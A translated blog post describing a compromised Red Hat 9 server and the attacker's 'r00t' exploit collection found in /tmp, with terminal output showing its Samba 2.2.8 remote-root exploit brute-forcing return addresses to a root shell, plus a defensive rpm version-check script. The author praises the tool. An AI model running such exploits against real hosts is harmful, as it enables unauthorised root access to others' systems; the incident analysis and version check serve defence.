Default Samba version overflow on Red Hat 9: get root demo (Vulnerability Research)

Source: Internet
Author: User
During a recent security analysis of a compromised server, I found the tool the attacker had used to elevate his privileges. He was using a Samba security vulnerability to escalate to root.
A few days earlier the server had been set up with the Samba server because it was being tested on the public network. The next day we found out that the server had been hacked.
The Samba in question is the default version shipped with Red Hat Linux 9. With the hacker's powerful exploit tool, escalating to root takes a mere 3 seconds.
Sweating yet?
While checking the server's /tmp I found an x2k3 directory:
[Bob@learnin9 tmp]$ cd x2k3/
[Bob@learnin9 x2k3]$ ls
bind ftp gkr identd r00t samba
[Bob@learnin9 x2k3]$
bind, ftp, gkr, identd and samba are directories and r00t is a program; let's look at what the r00t program does:
[Bob@learnin9 x2k3]$ ./r00t
.--------------------------------.
| x2k3/
| written by natok/
+------------------------+----.
| Targets: [1] Samba     | <= 2.2.8
|          [2] Bind      | 8.3.2/8.3.3/9.2.1
|          [3] gkrellmd  | < 2.1.12
|          [4] wu_ftpd   | <= 2.6.1
|          [5] identd    | 1.2
+------------------------+----.
| http://www.natok.de/
|____________________________/
./r00t
[Bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
[*] Range to scan: 127.0.0.0
[*] Socket connecting to port: 139
[*] Press Control+c for skipping!
Port 139 IP 127.0.0.0 -> Connection refused!
Port 139 IP 127.0.0.1 -> Connection ok!
[+] Let's sploit ;--)
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ bruteforce mode. (Linux)
+ Host is running Samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Using ret: [0xbffff6a0]
+ Using ret: [0xbffff574]
+ Using ret: [0xbffff448]
+ Using ret: [0xbffff31c]
+ Using ret: [0xbffff1f0]
+ Using ret: [0xbffff0c4]
+ Using ret: [0xbfffef98]
+ Using ret: [0xbfffee6c]
+ Using ret: [0xbfffed40]
+ Using ret: [0xbfffec14]
+ Using ret: [0xbfffeae8]
+ Using ret: [0xbfffe9bc]
+ Using ret: [0xbfffe890]
+ Using ret: [0xbfffe764]
+ Using ret: [0xbfffe638]
+ Using ret: [0xbfffe50c]
+ Using ret: [0xbfffe3e0]
+ Using ret: [0xbfffe2b4]
+ Using ret: [0xbfffe188]
+ worked!
--------------------------------------------------------------
JE MOET JE MUIL HOUWE
Linux learnin9 2.4.20-8 #1 Thu Mar 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
See? That is how easy it is to get root.
I only ran it against localhost here; against a remote host it works exactly the same way and hands over root directly.
Please take a good look at your own Red Hat 9: rpm -qa | grep ********* ... sweating already?
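As an added, defender-side illustration (not from the original post and not part of the r00t tool), the following script checks rpm -qa output against the Samba range the r00t banner lists as targeted (<= 2.2.8). The rpm -qa sample is constructed, and the version ordering is my own simplified approximation of RPM's rpmvercmp, enough to rank suffixed versions such as 2.2.8a above 2.2.8.

```python
import re

# Constructed sample of `rpm -qa` output; not captured from the post's server.
SAMPLE_RPM_QA = """\
samba-common-2.2.7a-7.9.0
samba-2.2.7a-7.9.0
samba-client-2.2.7a-7.9.0
openssh-server-3.5p1-6
"""

# Upper bound of the range the r00t banner lists for Samba ("Samba | <= 2.2.8").
MAX_TARGETED_SAMBA = "2.2.8"


def rpm_vercmp(a, b):
    """Simplified rpmvercmp: compare alternating numeric/alpha segments.

    Returns -1, 0 or 1. Numeric segments compare numerically, alpha segments
    lexically; a numeric segment outranks an alpha one, and when one version
    runs out of segments the longer one wins (so 2.2.8a > 2.2.8).
    """
    sa = re.findall(r"\d+|[A-Za-z]+", a)
    sb = re.findall(r"\d+|[A-Za-z]+", b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    return (len(sa) > len(sb)) - (len(sa) < len(sb))


def split_nvr(package):
    """Split an rpm NAME-VERSION-RELEASE string; names may contain dashes."""
    name, version, release = package.rsplit("-", 2)
    return name, version, release


def find_targeted_samba(rpm_qa_output):
    """Return the samba server packages whose version is <= the targeted range."""
    hits = []
    for line in rpm_qa_output.splitlines():
        line = line.strip()
        if not line:
            continue
        name, version, _release = split_nvr(line)
        if name == "samba" and rpm_vercmp(version, MAX_TARGETED_SAMBA) <= 0:
            hits.append(line)
    return hits


if __name__ == "__main__":
    for pkg in find_targeted_samba(SAMPLE_RPM_QA):
        print("in r00t's Samba target range:", pkg)
```

On a real host, feed it the output of rpm -qa instead of the constructed sample.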
The tool also carries overflow programs for bind, gkrellmd, wu_ftpd and identd. I don't know whether these are exploits that the hacker community has not yet publicly disclosed. Oh!
My server was not running bind, gkrellmd, wu_ftpd or identd; it only ran the default installation of Samba, but it was on the public network, so the hacker hit the jackpot and got into my server. Congratulations are welcome: I have finally found such a good tool.
Rejoice. I went to http://www.natok.de/ and, surprisingly, found it is a Chinese website. Who is behind it? I'm curious.
It can be said that the r00t program was written by Natok, but the exploit programs were not written by him; he just collected the other overflow programs and gave them a friendly interface. Still, the collection is very strong.
I hope to get to know this guy!
